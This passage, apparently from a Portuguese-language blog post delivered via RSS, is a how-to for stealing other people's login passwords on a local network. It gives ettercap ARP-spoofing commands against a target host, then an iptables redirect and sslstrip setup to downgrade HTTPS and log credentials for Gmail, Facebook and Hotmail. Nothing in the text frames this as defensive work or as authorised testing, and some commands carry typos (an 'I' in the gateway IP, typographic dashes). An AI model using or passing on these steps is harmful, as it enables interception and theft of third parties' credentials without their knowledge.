<p> <span style="line-height: 1.5em;">     No meu caso, ficou dessa forma:</span></p>
</div>
<div>
<p> <i style="line-height: 1.5em;"># ettercap -Tq -i eth0 -M arp:remote,oneway /192.168.0.67/ /I92.168.0.1/</i></p>
</div>
<div>
<p> <span style="line-height: 1.5em;">     Desta forma, todo o tráfico já é interceptado, e é possível capturar senhas não criptografadas com o Wireshark, por exemplo, como no print abaixo:</span></p>
</div>
<p><a href="http://1.bp.blogspot.com/-C6Pv4mgx3E4/TsQYn7T0aUI/AAAAAAAAABk/iFYmmvVHOwk/s1600/pass1.jpg"><img decoding="async" alt="" src="https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2F1.bp.blogspot.com%2F-C6Pv4mgx3E4%2FTsQYn7T0aUI%2FAAAAAAAAABk%2FiFYmmvVHOwk%2Fs640%2Fpass1.jpg&amp;container=blogger&amp;gadget=a&amp;rewriteMime=image%2F*" width="640" height="390" border="0" data-orig-src="http://1.bp.blogspot.com/-C6Pv4mgx3E4/TsQYn7T0aUI/AAAAAAAAABk/iFYmmvVHOwk/s640/pass1.jpg" /></a></p>
<div>
<p> <span style="line-height: 1.5em;"> </span><span style="line-height: 1.5em;">     Mas e as senhas criptografadas? Para elas vamos utilizar o Sslstrip, que faz uma espécie de “proxy”, fazendo a leitura das páginas https e convertendo-as para http. Para acioná-lo executar os passos abaixo:</span></p>
</div>
<div>
<p><i style="line-height: 1.5em;"># iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 8080</i></p>
</div>
<div>
<p><i style="line-height: 1.5em;"># sslstrip -l 8080 -w /root/log.txt</i></p>
</div>
<div>
<p><span style="line-height: 1.5em;">     Pronto! Todos as requisições https ficarão registradas em /root/log.txt. Com isso é possível capturar senhas do Hotmail, MSN, Gmail, Facebook, entre outras. (ver print abaixo).</span></p>
</div>
<p><a href="http://2.bp.blogspot.com/-6PntjY-7grU/TsQYvvufeYI/AAAAAAAAABs/PIb8EGX_wOw/s1600/pass2.jpg"><img decoding="async" alt="" src="https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2F2.bp.blogspot.com%2F-6PntjY-7grU%2FTsQYvvufeYI%2FAAAAAAAAABs%2FPIb8EGX_wOw%2Fs640%2Fpass2.jpg&amp;container=blogger&amp;gadget=a&amp;rewriteMime=image%2F*" width="640" height="110" border="0" data-orig-src="http://2.bp.blogspot.com/-6PntjY-7grU/TsQYvvufeYI/AAAAAAAAABs/PIb8EGX_wOw/s640/pass2.jpg" /></a></p>
<div>
<p><span style="line-height: 1.5em;">     Caso queira mais informações, pode ver no artigo original, feito por Ygor Bittencourt, publicado na revista ADMIN, Redes &amp; Segurança, 3° edição. Até mais&#8230;&#8230;</span></p>
</div>
<div>
<p>&nbsp;</p>
</div>
<p>The post <a href="https://gesielbernardes.eti.br/como-capturar-senhas-do-facebook-gmail-twitter.html">Como capturar senhas do Facebook, Gmail, Twitter&#8230;</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
